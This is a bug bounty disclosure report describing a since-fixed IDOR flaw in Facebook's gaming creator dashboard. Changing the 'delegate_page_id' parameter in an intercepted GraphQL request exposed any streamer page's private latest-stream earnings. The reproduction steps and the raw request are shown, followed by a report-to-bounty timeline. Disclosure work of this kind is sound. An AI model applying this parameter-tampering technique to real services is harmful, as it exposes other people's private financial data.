Sarmad Hassan

Published On: 25 Mar 2021

Disclose latest stream video asset earnings for any gaming streamer page

IDOR
Facebook | Web
---
MEDIUM VALID

In Facebook gaming dashboard there is an option called "viewing stream report, where streamers can know some information about their stream like, Title, description, Tagged game etc, for more info see https://www.facebook.com/business/help/423354648152123?id=648321075955172

Description

The Post request that handle that option is vulnerable to an IDOR bug in the parameter called "delegate_page_id", where it is possible to disclose the money amount for any latest live stream for any gaming streamer page.

Impact

This is will allow the attacker to disclose latest stream video asset earnings for any gaming streamer page.




Reproduction Steps

Step
1

From attacker account
==================
1- Go to https://business.facebook.com/creatorstudio/home ==> Creative tools ===> Live dashboard
2- Go to Latest stream box option ==> Intercept with bupsuite ==> click on "View Stream Report"

you should see POST request like below:

POST /api/graphql/ HTTP/1.1
Host: business.facebook.com

av=attacker_page_id&__user=attacker_user_id&__a=1&__dyn=xxx&__csr=&__req=1l&__beoa=0&__pc=PHASED%3Amedia_manager_pkg&dpr=1&__ccg=EXCELLENT&__rev=1003338073&__s=1go6yt%3A1dmt22%3Amrohob&__hsi=6931897176295571644-0&__comet_req=0&fb_dtsg=xxxxxx&jazoest=22015&__jssesw=1&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=GamesVideoStreamerDashboardProfilePlusVideoQuery&variables={"delegate_page_id":"attacker_page_ID"}&server_timestamps=true&doc_id=5005787666128910

The vulnerable parameter is "delegate_page_id", change the value of it to any streamer page, and forward the request to the server.

you will get a lot of information about the streamer page and one of them is the below private info:

- "latest_stream_video_asset_earnings":"money amount in number" for example as below:
  "latest_stream_video_asset_earnings":"500.00"

which disclose the money amount of his latest stream video.


The above info, consider as private and should not be visible by anyone except the page admins.

Timeline
.
Sarmad 22 Feb 2021

Initial Report

.
Facebook 24 Feb 2021

Report Triaged

.
Facebook 16 Mar 2021

Report Fixed

.
Sarmad 16 Mar 2021

Fix Confirmed

.
Facebook 19 Mar 2021

Bounty awarded+Bonus

VALID